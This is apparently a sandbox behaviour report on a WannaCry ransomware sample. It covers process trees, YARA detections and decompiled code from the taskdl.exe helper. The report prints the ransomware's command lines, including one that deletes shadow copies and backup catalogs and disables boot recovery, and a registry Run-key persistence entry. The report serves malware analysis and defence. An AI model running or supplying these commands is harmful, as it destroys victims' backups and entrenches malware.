Path:	C:\Users\user\Desktop\@WanaDecryptor@.exe
Wow64 process (32bit):	true
Commandline:	@WanaDecryptor@.exe co
Imagebase:	0x400000
File size:	245'760 bytes
MD5 hash:	7BF2B57F2A205768755C07F238FB32CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000001B.00000000.2015355782.000000000041F000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security
Antivirus matches:	Detection: 96%, ReversingLabs
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 8696, Parent PID: 2584

General

Target ID:	28
Start time:	14:50:40
Start date:	16/08/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c start /b @WanaDecryptor@.exe vs
Imagebase:	0xca0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 8796, Parent PID: 8696

General

Target ID:	29
Start time:	14:50:40
Start date:	16/08/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6205a0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: @WanaDecryptor@.exePID: 8904, Parent PID: 8696

General

Target ID:	30
Start time:	14:50:40
Start date:	16/08/2023
Path:	C:\Users\user\Desktop\@WanaDecryptor@.exe
Wow64 process (32bit):	true
Commandline:	@WanaDecryptor@.exe vs
Imagebase:	0x400000
File size:	245'760 bytes
MD5 hash:	7BF2B57F2A205768755C07F238FB32CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000001E.00000000.2017719338.000000000041F000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: taskhsvc.exePID: 3644, Parent PID: 8616

General

Target ID:	31
Start time:	14:50:43
Start date:	16/08/2023
Path:	C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
Wow64 process (32bit):	true
Commandline:	TaskData\Tor\taskhsvc.exe
Imagebase:	0xd90000
File size:	3'098'624 bytes
MD5 hash:	FE7EB54691AD6E6AF77F8A9A0B6DE26D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: taskse.exePID: 9112, Parent PID: 2584

General

Target ID:	32
Start time:	14:50:43
Start date:	16/08/2023
Path:	C:\Users\user\Desktop\taskse.exe
Wow64 process (32bit):	true
Commandline:	taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	8495400F199AC77853C53B5A3F278F3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 89%, ReversingLabs
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: @WanaDecryptor@.exePID: 8068, Parent PID: 2584

General

Target ID:	33
Start time:	14:50:43
Start date:	16/08/2023
Path:	C:\Users\user\Desktop\@WanaDecryptor@.exe
Wow64 process (32bit):	true
Commandline:	@WanaDecryptor@.exe
Imagebase:	0x400000
File size:	245'760 bytes
MD5 hash:	7BF2B57F2A205768755C07F238FB32CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000021.00000002.5854720396.000000000041F000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000021.00000000.2040530880.000000000041F000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 9164, Parent PID: 2584

General

Target ID:	34
Start time:	14:50:43
Start date:	16/08/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "uqcbeegnpjpsq661" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
Imagebase:	0xca0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 8720, Parent PID: 9164

General

Target ID:	35
Start time:	14:50:43
Start date:	16/08/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6205a0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 2948, Parent PID: 9164

General

Target ID:	36
Start time:	14:50:43
Start date:	16/08/2023
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "uqcbeegnpjpsq661" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
Imagebase:	0x960000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1620, Parent PID: 3644

General

Target ID:	37
Start time:	14:50:43
Start date:	16/08/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6205a0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: taskdl.exePID: 3328, Parent PID: 2584

General

Target ID:	38
Start time:	14:50:43
Start date:	16/08/2023
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 9004, Parent PID: 8904

General

Target ID:	40
Start time:	14:50:51
Start date:	16/08/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Imagebase:	0xca0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 8956, Parent PID: 9004

General

Target ID:	41
Start time:	14:50:51
Start date:	16/08/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6205a0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: WMIC.exePID: 9024, Parent PID: 9004

General

Target ID:	42
Start time:	14:50:51
Start date:	16/08/2023
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	wmic shadowcopy delete
Imagebase:	0x500000
File size:	393'216 bytes
MD5 hash:	82BB8430531876FBF5266E53460A393E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: taskse.exePID: 5080, Parent PID: 2584

General

Target ID:	46
Start time:	14:51:13
Start date:	16/08/2023
Path:	C:\Users\user\Desktop\taskse.exe
Wow64 process (32bit):	true
Commandline:	taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	8495400F199AC77853C53B5A3F278F3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: @WanaDecryptor@.exePID: 5580, Parent PID: 2584

General

Target ID:	47
Start time:	14:51:13
Start date:	16/08/2023
Path:	C:\Users\user\Desktop\@WanaDecryptor@.exe
Wow64 process (32bit):	true
Commandline:	@WanaDecryptor@.exe
Imagebase:	0x400000
File size:	245'760 bytes
MD5 hash:	7BF2B57F2A205768755C07F238FB32CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000002F.00000002.2348326263.000000000041F000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000002F.00000000.2346390626.000000000041F000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: taskdl.exePID: 4672, Parent PID: 2584

General

Target ID:	48
Start time:	14:51:14
Start date:	16/08/2023
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: taskdl.exePID: 5472, Parent PID: 2584COMMON

Execution Graph

Execution Coverage:	24.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.2%
Total number of Nodes:	94
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00401080 Relevance: 19.7, APIs: 13, Instructions: 173
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 55%

			E00401080(intOrPtr _a4) {
				void* _v4;
				char _v16;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				char _v560;
				struct _WIN32_FIND_DATAW _v632;
				long _v1124;
				long _v1644;
				long _v1648;
				char _v1656;
				char _v1660;
				void* _v1664;
				void* _v1668;
				char _v1672;
				char _v1676;
				void* _v1680;
				char _v1681;
				void* _v1684;
				char _v1688;
				intOrPtr _v1696;
				intOrPtr _v1700;
				intOrPtr _v1704;
				intOrPtr _v1708;
				void* _t54;
				int _t57;
				intOrPtr _t62;
				intOrPtr _t64;
				WCHAR* _t65;
				char _t72;
				intOrPtr _t84;
				void* _t100;
				intOrPtr _t101;
				intOrPtr _t103;
				int _t105;
				void* _t106;
				intOrPtr _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				void* _t112;
				intOrPtr _t113;
				intOrPtr _t115;
				void* _t118;

				_push(0xffffffff);
				_push(E00401AA7);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t115;
				_v1676 = _v1681;
				_v1672 = 0;
				_v1668 = 0;
				_v1664 = 0;
				_v4 = 0;
				_v1680 = 0;
				E00401000(_a4,  &_v1124);
				swprintf( &_v1644, 0x403040,  &_v1124, 0x403050);
				_t118 = _t115 - 0x688 + 0x18;
				_t54 = FindFirstFileW( &_v1644,  &(_v632.nFileSizeHigh)); // executed
				_t112 = _t54;
				if(_t112 != 0xffffffff) {
					_t72 = _v1681;
					do {
						swprintf( &_v1644, 0x403034,  &_v1124,  &_v560);
						_v1660 = _t72;
						__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
						_t57 = wcslen( &_v1648);
						_t118 = _t118 + 0x14;
						_t105 = _t57;
						__imp__?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z(_t105, 1);
						if(_t57 != 0) {
							E00401330(_v1668,  &_v1656, _t105);
							_t118 = _t118 + 0xc;
							__imp__?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z(_t105);
						}
						_v16 = 1;
						E004013D0( &_v1688);
						_v28 = 0;
						__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(1, _v1680, 1,  &_v1672);
					} while (FindNextFileW(_t112,  &_v632) != 0);
					FindClose(_t112);
					_t100 = 0;
					_t106 = 0;
					while(1) {
						_t62 = _v1700;
						_t84 = _v1696;
						if(_t62 == 0 || _t100 >= _t84 - _t62 >> 4) {
							break;
						}
						_t65 =  *(_t106 + _t62 + 4);
						if(_t65 == 0) {
							_t65 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
						}
						if(DeleteFileW(_t65) != 0) {
							_v1708 = _v1708 + 1;
						}
						_t100 = _t100 + 1;
						_t106 = _t106 + 0x10;
					}
					_t101 = _t62;
					_t113 = _t84;
					_t107 = _t62;
					if(_t62 != _t84) {
						do {
							__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(1);
							_t107 = _t107 + 0x10;
						} while (_t107 != _t113);
						_t62 = _v1704;
					}
					_v1696 = _t101;
					_v32 = 0xffffffff;
					_t108 = _t62;
					if(_t62 != _t101) {
						do {
							__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(1);
							_t108 = _t108 + 0x10;
						} while (_t108 != _t101);
						_t62 = _v1704;
					}
					E004018D0(_t62, _t62);
					_t64 = _v1708;
				} else {
					_t103 = _v1668;
					_t110 = _v1672;
					_v4 = _t54;
					if(_t110 != _t103) {
						do {
							_t54 = E00401870(_t110, 0);
							_t110 = _t110 + 0x10;
						} while (_t110 != _t103);
						_t110 = _v1672;
					}
					E004018D0(_t54, _t110);
					_t64 = 0;
				}
				 *[fs:0x0] = _v40;
				return _t64;
			}

0x00401080
0x00401082
0x0040108d
0x0040108e
0x004010a5
0x004010a9
0x004010ad
0x004010b1
0x004010c5
0x004010cc
0x004010d0
0x004010f5
0x004010f7
0x00401107
0x0040110d
0x00401112
0x0040114a
0x0040114e
0x00401168
0x00401171
0x00401177
0x00401182
0x00401188
0x0040118b
0x00401194
0x0040119c
0x004011a9
0x004011ae
0x004011b6
0x004011b6
0x004011cc
0x004011d4
0x004011df
0x004011e7
0x004011fc
0x00401205
0x00401211
0x00401213
0x00401215
0x00401215
0x00401219
0x0040121f
0x00000000
0x00000000
0x0040122c
0x00401232
0x00401234
0x00401234
0x0040123e
0x00401240
0x00401240
0x00401244
0x00401245
0x00401245
0x0040124c
0x0040124e
0x00401250
0x00401252
0x00401254
0x00401258
0x0040125e
0x00401261
0x00401265
0x00401265
0x0040126b
0x0040126f
0x0040127a
0x0040127c
0x0040127e
0x00401282
0x00401288
0x0040128b
0x0040128f
0x0040128f
0x00401294
0x00401299
0x00401114
0x00401114
0x00401118
0x0040111e
0x00401125
0x00401127
0x0040112a
0x0040112f
0x00401132
0x00401136
0x00401136
0x0040113b
0x00401143
0x00401143
0x004012ab
0x004012b8

APIs

Part of subcall function 00401000: GetWindowsDirectoryW.KERNEL32(00000019,00000104,757F0F00,00000019,004010D5,?,?,757F0F00,00000019,757F3300,00000000), ref: 0040100C
Part of subcall function 00401000: GetTempPathW.KERNEL32(00000104,00000019), ref: 00401028
Part of subcall function 00401000: wcslen.MSVCRT ref: 00401035
Part of subcall function 00401000: wcslen.MSVCRT ref: 0040103F
Part of subcall function 00401000: wcslen.MSVCRT ref: 0040104D

swprintf.MSVCRT(?,00403040,?,00403050,757F3300,00000000), ref: 004010F5
FindFirstFileW.KERNELBASE(?,?), ref: 00401107
swprintf.MSVCRT(?,00403034,?,?), ref: 00401168
?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 00401177
wcslen.MSVCRT ref: 00401182
?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(00000000,00000001), ref: 00401194
?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(00000000), ref: 004011B6
?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 004011E7
FindNextFileW.KERNEL32(00000000,?), ref: 004011F6
FindClose.KERNEL32(00000000), ref: 00401205
DeleteFileW.KERNEL32(?), ref: 0040123A
?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00401258
?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00401282

Memory Dump Source

Source File: 00000006.00000002.839432959.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.839396780.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.839471092.0000000000402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.839500405.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_taskdl.jbxd

Similarity

API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$Tidy@?$basic_string@wcslen$FileFind$swprintf$CloseDeleteDirectoryEos@?$basic_string@FirstGrow@?$basic_string@NextPathTempWindows
String ID:
API String ID: 2889739147-0
Opcode ID: d094fdb74faa2036a2288d1d3d1a61125983eed402f55e78df214a8260d1f803
Instruction ID: c02e7cbfb6260119d7520a8cc5a4b78e5b9d8733a8a6b2d1cbf059c3021fc26b
Opcode Fuzzy Hash: d094fdb74faa2036a2288d1d3d1a61125983eed402f55e78df214a8260d1f803
Instruction Fuzzy Hash: E551C3716043419FD720DF64C884B9BB7E9FBC8348F044A2EF589B32D1D6789945CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004018F6 Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;

				_push(0xffffffff);
				_push(0x4020a8);
				_push(0x401a7c);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x403084 =  *0x403084 | 0xffffffff;
				 *0x403088 =  *0x403088 | 0xffffffff;
				 *(__p__fmode()) =  *0x403080;
				 *(__p__commode()) =  *0x40307c;
				 *0x40308c = _adjust_fdiv;
				_t27 = E00401A7B( *_adjust_fdiv);
				if( *0x403070 == 0) {
					__setusermatherr(E00401A78);
				}
				E00401A66(_t27);
				_push(0x40300c);
				_push(0x403008);
				L00401A60();
				_v112 =  *0x403078;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x403074,  &_v112);
				_push(0x403004);
				_push(0x403000);
				L00401A60();
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_push(_t38);
				_push(_t55);
				_push(0);
				_push(GetModuleHandleA(0));
				_t40 = E004012C0();
				_v108 = _t40;
				exit(_t40); // executed
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L00401A5A();
				return _t41;
			}

0x004018f9
0x004018fb
0x00401900
0x0040190b
0x0040190c
0x00401919
0x0040191e
0x00401923
0x0040192a
0x00401931
0x00401944
0x00401952
0x0040195b
0x00401960
0x0040196b
0x00401972
0x00401978
0x00401979
0x0040197e
0x00401983
0x00401988
0x00401992
0x004019ab
0x004019b1
0x004019b6
0x004019bb
0x004019c8
0x004019ca
0x004019d0
0x00401a0c
0x00401a11
0x00401a12
0x00401a12
0x004019d2
0x004019d2
0x004019d2
0x004019d3
0x004019d6
0x004019d8
0x004019e3
0x004019e5
0x004019e5
0x004019e6
0x004019e6
0x004019e3
0x004019e9
0x004019ed
0x00000000
0x00000000
0x004019f3
0x004019fa
0x00401a04
0x00401a19
0x00401a06
0x00401a06
0x00401a06
0x00401a1a
0x00401a1b
0x00401a1c
0x00401a24
0x00401a25
0x00401a2a
0x00401a2e
0x00401a34
0x00401a39
0x00401a3b
0x00401a3e
0x00401a3f
0x00401a40
0x00401a47

APIs

__set_app_type.MSVCRT ref: 00401923
__p__fmode.MSVCRT ref: 00401938
__p__commode.MSVCRT ref: 00401946
__setusermatherr.MSVCRT ref: 00401972
_initterm.MSVCRT ref: 00401988
__getmainargs.MSVCRT ref: 004019AB
_initterm.MSVCRT ref: 004019BB
GetStartupInfoA.KERNEL32(?), ref: 004019FA
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00401A1E
exit.KERNELBASE ref: 00401A2E
_XcptFilter.MSVCRT ref: 00401A40

Memory Dump Source

Source File: 00000006.00000002.839432959.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.839396780.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.839471092.0000000000402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.839500405.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_taskdl.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: 4015c31cfa7eab49e8c51e62fd741af3e0d2f81cb378811d4cbcafae977c22e0
Instruction ID: 68ab6ae738ded19f39d0610043d4fcd1ea5deb11ceedb7bb579f538117b6dbca
Opcode Fuzzy Hash: 4015c31cfa7eab49e8c51e62fd741af3e0d2f81cb378811d4cbcafae977c22e0
Instruction Fuzzy Hash: 42417EB5901344EFDB209FA4DA49A6ABFB8EB09715F20023FF581B72E1D6784940CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004012C0 Relevance: 4.5, APIs: 3, Instructions: 41
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004012C0() {
				intOrPtr _v4;
				short _v8;
				unsigned int _t8;
				int _t13;
				unsigned int _t15;
				signed int _t21;
				short* _t23;

				_t23 =  &_v8;
				_t8 = GetLogicalDrives(); // executed
				_t15 = _t8;
				_t21 = 0x19;
				do {
					_v8 =  *0x403060;
					_v4 =  *0x403064;
					_t3 = _t21 + 0x41; // 0x5a
					_v8 = _t3;
					if((_t15 >> _t21 & 0x00000001) != 0) {
						_t13 = GetDriveTypeW( &_v8); // executed
						if(_t13 != 4) {
							E00401080(_t21);
							_t23 =  &(_t23[2]);
							Sleep(0xa); // executed
						}
					}
					_t21 = _t21 - 1;
				} while (_t21 >= 2);
				return 0;
			}

0x004012c0
0x004012c7
0x004012d9
0x004012db
0x004012e0
0x004012eb
0x004012ef
0x004012f9
0x004012fc
0x00401303
0x0040130a
0x0040130f
0x00401312
0x00401317
0x0040131c
0x0040131c
0x0040130f
0x0040131e
0x0040131f
0x0040132d

APIs

GetLogicalDrives.KERNELBASE ref: 004012C7
GetDriveTypeW.KERNELBASE(?,?,?,?,00000000,?,0000000A), ref: 0040130A

Part of subcall function 00401080: swprintf.MSVCRT(?,00403040,?,00403050,757F3300,00000000), ref: 004010F5
Part of subcall function 00401080: FindFirstFileW.KERNELBASE(?,?), ref: 00401107

Sleep.KERNELBASE(0000000A,00000000,?,0000000A), ref: 0040131C

Memory Dump Source

Source File: 00000006.00000002.839432959.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.839396780.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.839471092.0000000000402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.839500405.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_taskdl.jbxd

Similarity

API ID: DriveDrivesFileFindFirstLogicalSleepTypeswprintf
String ID:
API String ID: 570308627-0
Opcode ID: fac8c12e3c7440fa081a6b1de2581f42964eb1eb3cef597a2f435b430f1423df
Instruction ID: 4c7b1852939095ad3804a53ba97627e403d947e7219eb0394d6b0875d80bfcc1
Opcode Fuzzy Hash: fac8c12e3c7440fa081a6b1de2581f42964eb1eb3cef597a2f435b430f1423df
Instruction Fuzzy Hash: D9F0C8756043044BD310DF18ED4065B77A5EB99354F00053EED45B3390D776990DC6AA

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00401690 Relevance: 10.6, APIs: 7, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?_Xran@std@@YAXXZ.MSVCP60(?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,76115320,00000000,00000000,?,?), ref: 004016EE
?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,76115320,00000000,00000000,?,?), ref: 004016F6
?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 0040172D
?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 0040173A
?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00401742
?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,76115320,00000000,00000000,?), ref: 00401779
?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,76115320,00000000,00000000), ref: 004017BA

Memory Dump Source

Source File: 00000006.00000002.839432959.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.839396780.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.839471092.0000000000402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.839500405.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_taskdl.jbxd

Similarity

API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$Grow@?$basic_string@Split@?$basic_string@$Eos@?$basic_string@Tidy@?$basic_string@Xran@std@@
String ID:
API String ID: 2613176527-0
Opcode ID: d8cc844e41db627e1c4436b7b7a073ec45db5ac64ec8fc819127fe6e53c62420
